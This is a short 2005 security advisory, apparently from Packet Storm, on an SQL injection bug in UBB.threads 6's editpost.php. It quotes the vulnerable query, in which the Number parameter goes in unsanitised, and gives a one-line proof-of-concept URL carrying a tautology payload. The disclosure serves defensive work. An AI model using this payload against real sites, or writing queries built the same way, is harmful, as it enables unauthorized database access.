ubbSQL.txt

2005-03-15T00:00:00
ID PACKETSTORM:36601
Type packetstorm
Reporter kreon
Modified 2005-03-15T00:00:00

Description

                                        
                                            `  
  
  
ADZ Security Team  
===================  
Info  
  
Program: UBB.threads  
Version: 6  
Module: editpost.php  
Bug type: SQL Injection  
Vendor site: http://www.ubbcentral.com/ubbthreads/  
===================  
Bug discription  
  
at editpost.php we can see this code:  
// START  
$Cat = get_input("Cat","get");  
$Board = get_input("Board","get");  
$Number = get_input("Number","get");  
$page = get_input("page","get");  
$what = get_input("what","get");  
$vc = get_input("vc","get");  
// ...........  
$query = "  
SELECT  
B_Posterid,B_Subject,B_Body,B_Approved,B_Kept,B_Status,B_Main,B_Sticky,  
B_Posted,B_Icon,B_Poll,B_Convert,B_Topic,B_CalDay,B_CalMonth,B_CalYear,  
B_AddSig,B_Board FROM {$config['tbprefix']}Posts  
WHERE B_Number = '$Number'  
";  
//..........  
// END  
As we see, $Number not checked as int value, so... :)  
===================  
Example/PoC:  
  
http://[host]/[path]/editpost.php?Cat=X&Board=X&Number=1'%20OR%20'a'='a  
===================  
Contact  
  
ADZ Security Team // http://adz.void.ru/  
kreon // kre0n@mail.ru, adz.kreon@gmail.com  
===================  
  
  
  
`